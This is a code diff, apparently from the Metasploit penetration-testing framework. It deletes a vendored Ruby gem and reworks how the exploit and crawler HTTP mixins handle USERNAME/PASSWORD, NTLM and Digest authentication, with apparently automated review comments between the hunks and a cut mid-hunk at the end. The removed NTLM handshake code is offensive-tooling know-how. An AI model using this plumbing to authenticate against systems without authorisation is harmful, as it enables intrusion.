- -License -------- - -(The MIT License) - -Copyright (c) 2011 John Mair (banisterfiend) - -Permission is hereby granted, free of charge, to any person obtaining -a copy of this software and associated documentation files (the -'Software'), to deal in the Software without restriction, including -without limitation the rights to use, copy, modify, merge, publish, -distribute, sublicense, and/or sell copies of the Software, and to -permit persons to whom the Software is furnished to do so, subject to -the following conditions: - -The above copyright notice and this permission notice shall be -included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, -EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF -MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. -IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY -CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, -TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE -SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile deleted file mode 100644 index 92c0234f3b..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile +++ /dev/null 
@@ -1,76 +0,0 @@ -dlext = Config::CONFIG['DLEXT'] -direc = File.dirname(__FILE__) - -require 'rake/clean' -require 'rake/gempackagetask' -require "#{direc}/lib/method_source/version" - -CLOBBER.include("**/*.#{dlext}", "**/*~", "**/*#*", "**/*.log", "**/*.o") -CLEAN.include("ext/**/*.#{dlext}", "ext/**/*.log", "ext/**/*.o", - "ext/**/*~", "ext/**/*#*", "ext/**/*.obj", "**/*.rbc", - "ext/**/*.def", "ext/**/*.pdb", "**/*_flymake*.*", "**/*_flymake") - -def apply_spec_defaults(s) - s.name = "method_source" - s.summary = "retrieve the sourcecode for a method" - s.version = MethodSource::VERSION - s.date = Time.now.strftime '%Y-%m-%d' - s.author = "John Mair (banisterfiend)" - s.email = 'jrmair@gmail.com' - s.description = s.summary - s.require_path = 'lib' - - s.add_development_dependency("bacon","~>1.1.0") - s.add_development_dependency("rake", "~>0.9") - s.homepage = "http://banisterfiend.wordpress.com" - s.has_rdoc = 'yard' - s.files = `git ls-files`.split("\n") - s.test_files = `git ls-files -- test/*`.split("\n") -end - -task :test do - sh "bacon -q #{direc}/test/test.rb" -end - -desc "reinstall gem" -task :reinstall => :gems do - sh "gem uninstall method_source" rescue nil - sh "gem install #{direc}/pkg/method_source-#{MethodSource::VERSION}.gem" -end - -desc "Set up and run tests" -task :default => [:test] - -namespace :ruby do - spec = Gem::Specification.new do |s| - apply_spec_defaults(s) - s.platform = Gem::Platform::RUBY - end - - Rake::GemPackageTask.new(spec) do |pkg| - pkg.need_zip = false - pkg.need_tar = false - end - - desc "Generate gemspec file" - task :gemspec do - File.open("#{spec.name}.gemspec", "w") do |f| - f << spec.to_ruby - end - end -end - -desc "build all platform gems at once" -task :gems => [:rmgems, "ruby:gem"] - -desc "remove all platform gems" -task :rmgems => ["ruby:clobber_package"] - -desc "build and push latest gems" -task :pushgems => :gems do - chdir("#{direc}/pkg") do - Dir["*.gem"].each do |gemfile| - sh "gem push #{gemfile}" 
- end - end -end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb deleted file mode 100644 index 9a3c325f75..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb +++ /dev/null 
@@ -1,163 +0,0 @@ -# (C) John Mair (banisterfiend) 2011 -# MIT License - -direc = File.dirname(__FILE__) - -require "#{direc}/method_source/version" -require "#{direc}/method_source/source_location" - -module MethodSource - # Determine if a string of code is a valid Ruby expression. - # @param [String] code The code to validate. - # @return [Boolean] Whether or not the code is a valid Ruby expression. - # @example - # valid_expression?("class Hello") #=> false - # valid_expression?("class Hello; end") #=> true - def self.valid_expression?(str) - if defined?(Rubinius::Melbourne19) && RUBY_VERSION =~ /^1\.9/ - Rubinius::Melbourne19.parse_string(str) - elsif defined?(Rubinius::Melbourne) - Rubinius::Melbourne.parse_string(str) - else - catch(:valid) { - eval("BEGIN{throw :valid}\n#{str}") - } - end - true - rescue SyntaxError - false - end - - # Helper method responsible for extracting method body. - # Defined here to avoid polluting `Method` class. - # @param [Array] source_location The array returned by Method#source_location - # @return [File] The opened source file - def self.source_helper(source_location) - return nil if !source_location.is_a?(Array) - - file_name, line = source_location - File.open(file_name) do |file| - (line - 1).times { file.readline } - - code = "" - loop do - val = file.readline - code << val - - return code if valid_expression?(code) - end - end - end - - # Helper method responsible for opening source file and buffering up - # the comments for a specified method. Defined here to avoid polluting - # `Method` class. - # @param [Array] source_location The array returned by Method#source_location - # @return [String] The comments up to the point of the method. 
- def self.comment_helper(source_location) - return nil if !source_location.is_a?(Array) - - file_name, line = source_location - File.open(file_name) do |file| - buffer = "" - (line - 1).times do - line = file.readline - # Add any line that is a valid ruby comment, - # but clear as soon as we hit a non comment line. - if (line =~ /^\s*#/) || (line =~ /^\s*$/) - buffer << line.lstrip - else - buffer.replace("") - end - end - - buffer - end - end - - # This module is to be included by `Method` and `UnboundMethod` and - # provides the `#source` functionality - module MethodExtensions - - # We use the included hook to patch Method#source on rubinius. - # We need to use the included hook as Rubinius defines a `source` - # on Method so including a module will have no effect (as it's - # higher up the MRO). - # @param [Class] klass The class that includes the module. - def self.included(klass) - if klass.method_defined?(:source) && Object.const_defined?(:RUBY_ENGINE) && - RUBY_ENGINE =~ /rbx/ - - klass.class_eval do - orig_source = instance_method(:source) - - define_method(:source) do - begin - super - rescue - orig_source.bind(self).call - end - end - - end - end - end - - # Return the sourcecode for the method as a string - # (This functionality is only supported in Ruby 1.9 and above) - # @return [String] The method sourcecode as a string - # @example - # Set.instance_method(:clear).source.display - # => - # def clear - # @hash.clear - # self - # end - def source - if respond_to?(:source_location) - source = MethodSource.source_helper(source_location) - - raise "Cannot locate source for this method: #{name}" if !source - else - raise "#{self.class}#source not supported by this Ruby version (#{RUBY_VERSION})" - end - - source - end - - # Return the comments associated with the method as a string. 
- # (This functionality is only supported in Ruby 1.9 and above) - # @return [String] The method's comments as a string - # @example - # Set.instance_method(:clear).comment.display - # => - # # Removes all elements and returns self. - def comment - if respond_to?(:source_location) - comment = MethodSource.comment_helper(source_location) - - raise "Cannot locate source for this method: #{name}" if !comment - else - raise "#{self.class}#comment not supported by this Ruby version (#{RUBY_VERSION})" - end - - comment - end - end -end - -class Method - include MethodSource::SourceLocation::MethodExtensions - include MethodSource::MethodExtensions -end - -class UnboundMethod - include MethodSource::SourceLocation::UnboundMethodExtensions - include MethodSource::MethodExtensions -end - -class Proc - include MethodSource::SourceLocation::ProcExtensions - include MethodSource::MethodExtensions -end - diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb deleted file mode 100644 index 9161854819..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb +++ /dev/null 
@@ -1,138 +0,0 @@ -module MethodSource - module ReeSourceLocation - # Ruby enterprise edition provides all the information that's - # needed, in a slightly different way. - def source_location - [__file__, __line__] rescue nil - end - end - - module SourceLocation - module MethodExtensions - if Proc.method_defined? :__file__ - include ReeSourceLocation - - elsif defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /jruby/ - require 'java' - - # JRuby version source_location hack - # @return [Array] A two element array containing the source location of the method - def source_location - to_java.source_location(Thread.current.to_java.getContext()) - end - else - - - def trace_func(event, file, line, id, binding, classname) - return unless event == 'call' - set_trace_func nil - - @file, @line = file, line - raise :found - end - - private :trace_func - - # Return the source location of a method for Ruby 1.8. - # @return [Array] A two element array. First element is the - # file, second element is the line in the file where the - # method definition is found. - def source_location - if @file.nil? - args =[*(1..(arity<-1 ? -arity-1 : arity ))] - - set_trace_func method(:trace_func).to_proc - call(*args) rescue nil - set_trace_func nil - @file = File.expand_path(@file) if @file && File.exist?(File.expand_path(@file)) - end - return [@file, @line] if File.exist?(@file.to_s) - end - end - end - - module ProcExtensions - if Proc.method_defined? :__file__ - include ReeSourceLocation - - elsif defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /rbx/ - - # Return the source location for a Proc (Rubinius only) - # @return [Array] A two element array. First element is the - # file, second element is the line in the file where the - # proc definition is found. - def source_location - [block.file.to_s, block.line] - end - else - - # Return the source location for a Proc (in implementations - # without Proc#source_location) - # @return [Array] A two element array. 
First element is the - # file, second element is the line in the file where the - # proc definition is found. - def source_location - self.to_s =~ /@(.*):(\d+)/ - [$1, $2.to_i] - end - end - end - - module UnboundMethodExtensions - if Proc.method_defined? :__file__ - include ReeSourceLocation - - elsif defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /jruby/ - require 'java' - - # JRuby version source_location hack - # @return [Array] A two element array containing the source location of the method - def source_location - to_java.source_location(Thread.current.to_java.getContext()) - end - - else - - - # Return the source location of an instance method for Ruby 1.8. - # @return [Array] A two element array. First element is the - # file, second element is the line in the file where the - # method definition is found. - def source_location - klass = case owner - when Class - owner - when Module - method_owner = owner - Class.new { include(method_owner) } - end - - # deal with immediate values - case - when klass == Symbol - return :a.method(name).source_location - when klass == Fixnum - return 0.method(name).source_location - when klass == TrueClass - return true.method(name).source_location - when klass == FalseClass - return false.method(name).source_location - when klass == NilClass - return nil.method(name).source_location - end - - begin - Object.instance_method(:method).bind(klass.allocate).call(name).source_location - rescue TypeError - - # Assume we are dealing with a Singleton Class: - # 1. Get the instance object - # 2. Forward the source_location lookup to the instance - instance ||= ObjectSpace.each_object(owner).first - Object.instance_method(:method).bind(instance).call(name).source_location - end - end - end - end - end -end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb deleted file mode 100644 index b8142bfaef..0000000000 
--- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb +++ /dev/null @@ -1,3 +0,0 @@ -module MethodSource - VERSION = "0.7.1" -end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec deleted file mode 100644 index 83a727d6f6..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec +++ /dev/null @@ -1,33 +0,0 @@ -# -*- encoding: utf-8 -*- - -Gem::Specification.new do |s| - s.name = "method_source" - s.version = "0.7.0" - - s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version= - s.authors = ["John Mair (banisterfiend)"] - s.date = "2012-01-01" - s.description = "retrieve the sourcecode for a method" - s.email = "jrmair@gmail.com" - s.files = [".gemtest", ".travis.yml", ".yardopts", "Gemfile", "LICENSE", "README.markdown", "Rakefile", "lib/method_source.rb", "lib/method_source/source_location.rb", "lib/method_source/version.rb", "method_source.gemspec", "test/test.rb", "test/test_helper.rb"] - s.homepage = "http://banisterfiend.wordpress.com" - s.require_paths = ["lib"] - s.rubygems_version = "1.8.10" - s.summary = "retrieve the sourcecode for a method" - s.test_files = ["test/test.rb", "test/test_helper.rb"] - - if s.respond_to? :specification_version then - s.specification_version = 3 - - if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then - s.add_development_dependency(%q, ["~> 1.1.0"]) - s.add_development_dependency(%q, ["~> 0.9"]) - else - s.add_dependency(%q, ["~> 1.1.0"]) - s.add_dependency(%q, ["~> 0.9"]) - end - else - s.add_dependency(%q, ["~> 1.1.0"]) - s.add_dependency(%q, ["~> 0.9"]) - end -end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb deleted file mode 100644 index 425e56acf9..0000000000 
--- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb +++ /dev/null 
@@ -1,122 +0,0 @@ -direc = File.dirname(__FILE__) - -require 'rubygems' -require 'bacon' -require "#{direc}/../lib/method_source" -require "#{direc}/test_helper" - -describe MethodSource do - - describe "source_location (testing 1.8 implementation)" do - it 'should return correct source_location for a method' do - method(:hello).source_location.first.should =~ /test_helper/ - end - - it 'should not raise for immediate instance methods' do - [Symbol, Fixnum, TrueClass, FalseClass, NilClass].each do |immediate_class| - lambda { immediate_class.instance_method(:to_s).source_location }.should.not.raise - end - end - - it 'should not raise for immediate methods' do - [:a, 1, true, false, nil].each do |immediate| - lambda { immediate.method(:to_s).source_location }.should.not.raise - end - end - end - - before do - @hello_module_source = " def hello; :hello_module; end\n" - @hello_singleton_source = "def $o.hello; :hello_singleton; end\n" - @hello_source = "def hello; :hello; end\n" - @hello_comment = "# A comment for hello\n# It spans two lines and is indented by 2 spaces\n" - @lambda_comment = "# This is a comment for MyLambda\n" - @lambda_source = "MyLambda = lambda { :lambda }\n" - @proc_source = "MyProc = Proc.new { :proc }\n" - end - - it 'should define methods on Method and UnboundMethod and Proc' do - Method.method_defined?(:source).should == true - UnboundMethod.method_defined?(:source).should == true - Proc.method_defined?(:source).should == true - end - - describe "Methods" do - it 'should return source for method' do - method(:hello).source.should == @hello_source - end - - it 'should return source for a method defined in a module' do - M.instance_method(:hello).source.should == @hello_module_source - end - - it 'should return source for a singleton method as an instance method' do - class << $o; self; end.instance_method(:hello).source.should == @hello_singleton_source - end - - it 'should return source for a singleton method' do - 
$o.method(:hello).source.should == @hello_singleton_source - end - - - it 'should return a comment for method' do - method(:hello).comment.should == @hello_comment - end - - - if !is_rbx? - it 'should raise for C methods' do - lambda { method(:puts).source }.should.raise RuntimeError - end - end - end - - # if RUBY_VERSION =~ /1.9/ || is_rbx? - describe "Lambdas and Procs" do - it 'should return source for proc' do - MyProc.source.should == @proc_source - end - - it 'should return an empty string if there is no comment' do - MyProc.comment.should == '' - end - - it 'should return source for lambda' do - MyLambda.source.should == @lambda_source - end - - it 'should return comment for lambda' do - MyLambda.comment.should == @lambda_comment - end - end - # end - describe "Comment tests" do - before do - @comment1 = "# a\n# b\n" - @comment2 = "# a\n# b\n" - @comment3 = "# a\n#\n# b\n" - @comment4 = "# a\n# b\n" - @comment5 = "# a\n# b\n# c\n# d\n" - end - - it "should correctly extract multi-line comments" do - method(:comment_test1).comment.should == @comment1 - end - - it "should correctly strip leading whitespace before comments" do - method(:comment_test2).comment.should == @comment2 - end - - it "should keep empty comment lines" do - method(:comment_test3).comment.should == @comment3 - end - - it "should ignore blank lines between comments" do - method(:comment_test4).comment.should == @comment4 - end - - it "should align all comments to same indent level" do - method(:comment_test5).comment.should == @comment5 - end - end -end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb deleted file mode 100644 index 53da4e519c..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb +++ /dev/null 
@@ -1,50 +0,0 @@ -def is_rbx? - defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /rbx/ -end - -def jruby? - defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /jruby/ -end - - -module M - def hello; :hello_module; end -end - -$o = Object.new -def $o.hello; :hello_singleton; end - -# A comment for hello - - # It spans two lines and is indented by 2 spaces -def hello; :hello; end - -# a -# b -def comment_test1; end - - # a - # b -def comment_test2; end - -# a -# -# b -def comment_test3; end - -# a - -# b -def comment_test4; end - - -# a - # b - # c -# d -def comment_test5; end - -# This is a comment for MyLambda -MyLambda = lambda { :lambda } -MyProc = Proc.new { :proc } - diff --git a/lib/msf/core/auxiliary/crawler.rb b/lib/msf/core/auxiliary/crawler.rb index 36e963ecbc..168a130d5b 100644 --- a/lib/msf/core/auxiliary/crawler.rb +++ b/lib/msf/core/auxiliary/crawler.rb @@ -22,7 +22,9 @@ module Auxiliary::HttpCrawler Opt::Proxies, OptInt.new('MAX_PAGES', [ true, 'The maximum number of pages to crawl per URL', 500]), OptInt.new('MAX_MINUTES', [ true, 'The maximum number of minutes to spend on each URL', 5]), - OptInt.new('MAX_THREADS', [ true, 'The maximum number of concurrent requests', 4]) + OptInt.new('MAX_THREADS', [ true, 'The maximum number of concurrent requests', 4]), + OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication']), + OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication']) ], self.class ) @@ -118,8 +120,9 @@ module Auxiliary::HttpCrawler :info => "" }) - if datastore['BasicAuthUser'] - t[:http_basic_auth] = [ "#{datastore['BasicAuthUser']}:#{datastore['BasicAuthPass']}" ].pack("m*").gsub(/\s+/, '') + if datastore['USERNAME'] and datastore['USERNAME'] != '' + t[:username] = datastore['USERNAME'].to_s + t[:password] = datastore['PASSWORD'].to_s end if datastore['HTTPCookie'] 
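Review bot: In the crawler hunk `@@ -118,8 +120,9 @@`, `if datastore['USERNAME'] and datastore['USERNAME'] != ''` repeats the lookup and uses `and` for boolean logic; `unless datastore['USERNAME'].to_s.empty?` covers both `nil` and `''` in one expression. The same idiom appears in lib/msf/core/auxiliary/web/http.rb (`@@ -296,6 +299,10 @@`) and twice in lib/msf/core/exploit/http/client.rb (send_request_raw and send_request_cgi), so the replacement applies there too. In the options hunk (`@@ -22,7 +22,9 @@`) the new `USERNAME`/`PASSWORD` options have no default, whereas the HttpClient mixin's versions in this patch default to `''`; the `.to_s` calls make that harmless, but the two mixins would be easier to reason about with the same defaults.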
@@ -278,9 +281,8 @@ module Auxiliary::HttpCrawler opts[:cookies] = t[:cookies] end - if t[:http_basic_auth] - opts[:http_basic_auth] = t[:http_basic_auth] - end + opts[:username] = t[:username] || '' + opts[:password] =t[:password] || '' opts end diff --git a/lib/msf/core/auxiliary/web/http.rb b/lib/msf/core/auxiliary/web/http.rb index a7c8fc86e3..2ad3dbcb19 100644 --- a/lib/msf/core/auxiliary/web/http.rb +++ b/lib/msf/core/auxiliary/web/http.rb @@ -69,6 +69,7 @@ class Auxiliary::Web::HTTP attr_reader :framework attr_accessor :redirect_limit + attr_accessor :username , :password def initialize( opts = {} ) @opts = opts.dup @@ -84,8 +85,8 @@ class Auxiliary::Web::HTTP @request_opts = {} if opts[:auth].is_a? Hash - @request_opts['basic_auth'] = [ opts[:auth][:user].to_s + ':' + - opts[:auth][:password] ]. pack( 'm*' ).gsub( /\s+/, '' ) + @username = opts[:auth][:user].to_s + @password = opts[:auth][:password].to_s end self.redirect_limit = opts[:redirect_limit] || 20 @@ -105,7 +106,9 @@ class Auxiliary::Web::HTTP opts[:target].port, {}, opts[:target].ssl, - 'SSLv23' + 'SSLv23', + username, + password ) c.set_config({ @@ -296,6 +299,10 @@ class Auxiliary::Web::HTTP opts['data'] = body if body c = connect + if opts['username'] and opts['username'] != '' + c.username = opts['username'].to_s + c.password = opts['password'].to_s + end Response.from_rex_response c.send_recv( c.request_cgi( opts ), timeout ) rescue ::Timeout::Error Response.timed_out diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index 6d0bd9336b..5d8a48891e 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb 
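Review bot: In the web/http.rb hunk `@@ -296,6 +299,10 @@`, the `c.username = opts['username'].to_s` / `c.password = ...` assignments mutate the client object returned by `connect`; if that client is reused across requests (not visible from this hunk), credentials supplied for one request are sent on every later request that omits `opts['username']`. The exploit mixin in this same patch has the identical block in send_request_raw and send_request_cgi, where the connection is explicitly persisted, so a shared helper that scopes the override to the call would fix all three. Style in the same file and in crawler.rb: `attr_accessor :username , :password` and `opts[:password] =t[:password] || ''` should be `attr_accessor :username, :password` and `opts[:password] = t[:password] || ''`.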
@@ -46,10 +46,8 @@ module Exploit::Remote::HttpClient OptString.new('UserAgent', [false, 'The User-Agent header to use for all requests', Rex::Proto::Http::Client::DefaultUserAgent ]), - OptString.new('BasicAuthUser', [false, 'The HTTP username to specify for basic authentication']), - OptString.new('BasicAuthPass', [false, 'The HTTP password to specify for basic authentication']), - OptString.new('DigestAuthUser', [false, 'The HTTP username to specify for digest authentication']), - OptString.new('DigestAuthPassword', [false, 'The HTTP password to specify for digest authentication']), + OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', '']), + OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', '']), OptBool.new('DigestAuthIIS', [false, 'Conform to IIS, should work for most servers. Only set to false for non-IIS servers', true]), OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', false]), OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'SSL3', ['SSL2', 'SSL3', 'TLS1']]), @@ -156,7 +154,9 @@ module Exploit::Remote::HttpClient }, dossl, ssl_version, - proxies + proxies, + datastore['USERNAME'], + datastore['PASSWORD'] ) # Configure the HTTP client with the supplied parameter 
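Review bot: USERNAME and PASSWORD are registered with a default of '' rather than nil, so `datastore['USERNAME']` is now always truthy and plain truthiness guards such as the `return if not datastore['USERNAME']` in `basic_auth` later in this diff stop detecting "no credentials" (the crawler registers the same two options without a default in this series, so the mixins also disagree). Either drop the default, `OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication'])`, or make every consumer test emptiness instead of truthiness. Removing BasicAuthUser, BasicAuthPass, DigestAuthUser and DigestAuthPassword outright means any module or resource script still setting them now sends unauthenticated requests without any warning; a short deprecation shim that maps the old names onto USERNAME/PASSWORD (or at least a `print_warning` when they are set) would make the break visible.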
@@ -184,7 +184,15 @@ module Exploit::Remote::HttpClient 'pad_post_params_count' => datastore['HTTP::pad_post_params_count'], 'uri_fake_end' => datastore['HTTP::uri_fake_end'], 'uri_fake_params_start' => datastore['HTTP::uri_fake_params_start'], - 'header_folding' => datastore['HTTP::header_folding'] + 'header_folding' => datastore['HTTP::header_folding'], + 'usentlm2_session' => datastore['NTLM::UseNTLM2_session'], + 'use_ntlmv2' => datastore['NTLM::UseNTLMv2'], + 'send_lm' => datastore['NTLM::SendLM'], + 'send_ntlm' => datastore['NTLM::SendNTLM'], + 'SendSPN' => datastore['NTLM::SendSPN'], + 'UseLMKey' => datastore['NTLM::UseLMKey'], + 'domain' => datastore['DOMAIN'], + 'DigestAuthIIS' => datastore['DigestAuthIIS'] ) # If this connection is global, persist it @@ -251,6 +259,10 @@ module Exploit::Remote::HttpClient def send_request_raw(opts={}, timeout = 20) begin c = connect(opts) + if opts['username'] and opts['username'] != '' + c.username = opts['username'].to_s + c.password = opts['password'].to_s + end r = c.request_raw(opts) c.send_recv(r, opts[:timeout] ? opts[:timeout] : timeout) rescue ::Errno::EPIPE, ::Timeout::Error @@ -266,6 +278,10 @@ module Exploit::Remote::HttpClient def send_request_cgi(opts={}, timeout = 20) begin c = connect(opts) + if opts['username'] and opts['username'] != '' + c.username = opts['username'].to_s + c.password = opts['password'].to_s + end r = c.request_cgi(opts) c.send_recv(r, opts[:timeout] ? opts[:timeout] : timeout) rescue ::Errno::EPIPE, ::Timeout::Error 
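Review bot: The new set_config keys mix snake_case ('usentlm2_session', 'use_ntlmv2', 'send_lm', 'send_ntlm', 'domain') with CamelCase ('SendSPN', 'UseLMKey', 'DigestAuthIIS') inside one hash literal; unless the Rex client's config reader genuinely expects these exact spellings (not visible here), pick one convention, e.g. `'send_spn'`, `'use_lm_key'`, `'digest_auth_iis'`. A comment above the NTLM entries naming the consumer that reads them would also help, since this block is the only place the NTLM::* datastore options are wired through.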
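Review bot: In send_request_raw the request-level credentials are assigned onto the client returned by `connect(opts)`, and the identical block in send_request_cgi (the next hunk) does the same; the context of the preceding hunk says this connection may be global and persisted, so if `connect` hands back that persisted client the override sticks for every later request on it rather than only this one. Either restore the previous values after the request (an `ensure` around the `send_recv`) or document the stickiness with a comment such as `# NOTE: on a persisted connection these credentials remain set for subsequent requests`. Both methods still fall through the `rescue ::Errno::EPIPE, ::Timeout::Error` with no value, so they return nil on a dropped connection; that is what the winrm helper later in this series relies on.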
@@ -277,241 +293,8 @@ module Exploit::Remote::HttpClient # Combine the user/pass into an auth string for the HTTP Client # def basic_auth - return if not datastore['BasicAuthUser'] - datastore['BasicAuthUser'] + ":" + (datastore['BasicAuthPass'] || '') - end - - # - # Connect to the server, and perform NTLM authentication for this session. - # Note the return value is [resp,c], so the caller can have access to both - # the last response, and the connection itself -- this is important since - # NTLM auth is bound to this particular TCP session. - # - # TODO: Fix up error messaging a lot more -- right now it's pretty hard - # to tell what all went wrong. - # - def send_http_auth_ntlm(opts={}, timeout = 20) - #ntlm_message_1 = "NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=" - ntlm_options = { - :signing => false, - :usentlm2_session => datastore['NTLM::UseNTLM2_session'], - :use_ntlmv2 => datastore['NTLM::UseNTLMv2'], - :send_lm => datastore['NTLM::SendLM'], - :send_ntlm => datastore['NTLM::SendNTLM'] - } - - ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options) - workstation_name = Rex::Text.rand_text_alpha(rand(8)+1) - domain_name = datastore['DOMAIN'] - - ntlm_message_1 = "NTLM " + Rex::Text::encode_base64(NTLM_UTILS::make_ntlmssp_blob_init( domain_name, - workstation_name, - ntlmssp_flags)) - to = opts[:timeout] || timeout - begin - c = connect(opts) - - # First request to get the challenge - r = c.request_cgi(opts.merge({ - 'uri' => opts['uri'], - 'method' => 'GET', - 'headers' => { 'Authorization' => ntlm_message_1 }})) - resp = c.send_recv(r, to) - unless resp.kind_of? 
Rex::Proto::Http::Response - return [nil,nil] - end - return [nil,nil] if resp.code == 404 - return [nil,nil] unless resp.code == 401 && resp.headers['WWW-Authenticate'] - - # Get the challenge and craft the response - ntlm_challenge = resp.headers['WWW-Authenticate'].match(/NTLM ([A-Z0-9\x2b\x2f=]+)/i)[1] - return [nil,nil] unless ntlm_challenge - - - #old and simplier method but not compatible with windows 7/2008r2 - #ntlm_message_2 = Rex::Proto::NTLM::Message.decode64(ntlm_challenge) - #ntlm_message_3 = ntlm_message_2.response( {:user => opts['username'],:password => opts['password']}, {:ntlmv2 => true}) - - ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge) - blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2) - - challenge_key = blob_data[:challenge_key] - server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error - #netbios name - default_name = blob_data[:default_name] || '' - #netbios domain - default_domain = blob_data[:default_domain] || '' - #dns name - dns_host_name = blob_data[:dns_host_name] || '' - #dns domain - dns_domain_name = blob_data[:dns_domain_name] || '' - #Client time - chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || '' - - spnopt = {:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost} - - resp_lm, - resp_ntlm, - client_challenge, - ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses(opts['username'], opts['password'], challenge_key, - domain_name, default_name, default_domain, - dns_host_name, dns_domain_name, chall_MsvAvTimestamp, - spnopt, ntlm_options) - - ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth(domain_name, workstation_name, opts['username'], - resp_lm, resp_ntlm, '', ntlmssp_flags) - ntlm_message_3 = Rex::Text::encode_base64(ntlm_message_3) - - # Send the response - r = c.request_cgi(opts.merge({ - 'uri' => opts['uri'], - 'method' => 'GET', - 'headers' => { 'Authorization' => "NTLM #{ntlm_message_3}"}})) - resp = c.send_recv(r, to, true) - unless 
resp.kind_of? Rex::Proto::Http::Response - return [nil,nil] - end - return [nil,nil] if resp.code == 404 - return [resp,c] - - rescue ::Errno::EPIPE, ::Timeout::Error - end - end - - def send_digest_request_cgi(opts={}, timeout=20) - @nonce_count = 0 - - return [nil,nil] if not (datastore['DigestAuthUser'] or opts['DigestAuthUser']) - to = opts['timeout'] || timeout - - digest_user = datastore['DigestAuthUser'] || opts['DigestAuthUser'] || "" - digest_password = datastore['DigestAuthPassword'] || opts['DigestAuthPassword'] || "" - - method = opts['method'] - path = opts['uri'] - iis = true - if (opts['DigestAuthIIS'] == false or datastore['DigestAuthIIS'] == false) - iis = false - end - - begin - @nonce_count += 1 - - resp = opts['response'] - - if not resp - # Get authentication-challenge from server, and read out parameters required - c = connect(opts) - r = c.request_cgi(opts.merge({ - 'uri' => path, - 'method' => method })) - resp = c.send_recv(r, to) - unless resp.kind_of? Rex::Proto::Http::Response - return [nil,nil] - end - return [nil,nil] if resp.code == 404 - if resp.code != 401 - return resp - end - return [nil,nil] unless resp.headers['WWW-Authenticate'] - end - - # Don't anchor this regex to the beginning of string because header - # folding makes it appear later when the server presents multiple - # WWW-Authentication options (such as is the case with IIS configured - # for Digest or NTLM). 
